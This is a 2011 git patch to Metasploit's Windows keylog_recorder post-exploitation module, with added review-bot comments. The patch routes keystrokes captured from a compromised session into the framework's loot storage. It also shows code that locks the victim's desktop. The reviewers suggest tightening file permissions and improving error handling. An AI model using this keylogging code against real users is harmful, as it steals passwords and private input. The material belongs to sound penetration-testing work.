From 9bc2a2cd3a86eae83564ee755d224f4d27e6bc41 Mon Sep 17 00:00:00 2001 From: HD Moore Date: Sat, 26 Feb 2011 04:54:45 +0000 Subject: [PATCH] Store keystrokes as loot git-svn-id: file:///home/svn/framework3/trunk@11835 4d416f70-5f16-0410-b530-b9f4589650da --- lib/msf/core/auxiliary/report.rb | 2 +- .../post/windows/capture/keylog_recorder.rb | 31 +++++++------------ 2 files changed, 13 insertions(+), 20 deletions(-) diff --git a/lib/msf/core/auxiliary/report.rb b/lib/msf/core/auxiliary/report.rb index e5fad80e86..7e8161d8a2 100644 --- a/lib/msf/core/auxiliary/report.rb +++ b/lib/msf/core/auxiliary/report.rb @@ -175,7 +175,7 @@ module Auxiliary::Report path = File.join(Msf::Config.loot_directory, name) full_path = ::File.expand_path(path) - print_status("Writing #{ltype} (#{ctype}) for #{host}: (#{filename} - #{info})") + print_good("Writing #{ltype} (#{ctype}) for #{host}: (#{filename} - #{info})") File.open(full_path, "wb") do |fd| fd.write(data) end diff --git a/modules/post/windows/capture/keylog_recorder.rb b/modules/post/windows/capture/keylog_recorder.rb index cf75dfcef2..91ba406c2d 100644 --- a/modules/post/windows/capture/keylog_recorder.rb +++ b/modules/post/windows/capture/keylog_recorder.rb 
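Review bot: The `File.open(full_path, "wb")` context line in the report.rb hunk creates the loot file with whatever mode the process umask allows, and with this commit captured keystrokes (which can include passwords) are written through it. Passing an explicit mode, `File.open(full_path, "wb", 0600) do |fd|`, would keep the capture readable only by the account running the framework. The enclosing method starts and ends outside the hunk, so whether the loot directory itself is already restricted cannot be seen here.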
@@ -75,31 +75,24 @@ class Metasploit3 < Msf::Post end end + if startkeylogger keycap(datastore['INTERVAL'],set_log) end end - # Method for creation of log file + # Returns the path name to the stored loot filename def set_log - logs = ::File.join(Msf::Config.log_directory,'post','keylog_recorder') - filenameinfo = sysinfo['Computer'] + "_" + ::Time.now.strftime("%Y%m%d.%M%S") - # Create the log directory - ::FileUtils.mkdir_p(logs) - - #logfile name - logfile = logs + ::File::Separator + filenameinfo + ".txt" - - return logfile + store_loot("host.windows.keystrokes", "text/plain", session, "", "keystrokes.txt", "User Keystrokes") end def lock_screen - print_status("Locking Screen...") + print_status("Locking the desktop...") lock_info = session.railgun.user32.LockWorkStation() if lock_info["GetLastError"] == 0 print_status("Screen has been locked") else - print_error("Screen lock Failed") + print_error("Screen lock failed") end end @@ -185,7 +178,7 @@ class Metasploit3 < Msf::Post sleep(2) if not outp.empty? - print_good("keystrokes captured #{outp}") if datastore['ShowKeystrokes'] + print_good("Keystrokes captured #{outp}") if datastore['ShowKeystrokes'] file_local_write(logfile,"#{outp}\n") end end @@ -197,22 +190,22 @@ class Metasploit3 < Msf::Post #Creating DB for captured keystrokes print_status("Keystrokes being saved in to #{logfile}") #Inserting keystrokes every number of seconds specified - print_status("Recording ") + print_status("Recording keystrokes...") while rec == 1 - #getting and writing Keystrokes write_keylog_data(logfile) - sleep(keytime.to_i) end rescue::Exception => e - print_status "Saving last few keystrokes" + print_status "Saving last few keystrokes..." write_keylog_data(logfile) - - print("\n") print_status("#{e.class} #{e}") print_status("Stopping keystroke sniffer...") session.ui.keyscan_stop end end + def cleanup + session.ui.keyscan_stop rescue nil + end + end
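Review bot: `set_log` in the first keylog_recorder.rb hunk is no longer a pure path builder: it calls `store_loot` with empty data, so evaluating it as an argument in `keycap(datastore['INTERVAL'],set_log)` registers a loot entry before any keystroke exists, and the keystrokes are appended to that file afterwards by `file_local_write`. The new comment should say so, e.g. `# Registers an empty keystroke loot entry via store_loot and returns its local path; captured keys are appended to that file later`. That `store_loot` returns the path is assumed here, because the report.rb hunk does not show its return value. The old file name carried the computer name and a timestamp while the new one is the fixed `keystrokes.txt`, so it is worth confirming that `store_loot` makes the stored name unique, since it opens the file with `"wb"`.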
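Review bot: The new `cleanup` in the last hunk hides every failure of `session.ui.keyscan_stop` behind `rescue nil`, so a capture that is still running on the host after the module exits goes unreported. Keep it best-effort but report the failure: the body becomes `session.ui.keyscan_stop`, then `rescue ::StandardError => e` with `print_error("Could not stop keystroke sniffer: #{e.class} #{e}")`. The `rescue::Exception` branch of the recording loop calls `write_keylog_data(logfile)` before `session.ui.keyscan_stop`, so an error in that write skips the stop there and `cleanup` is the only remaining place it happens. If the parent class defines its own `cleanup`, this override should also call `super`; that is not visible in the hunk.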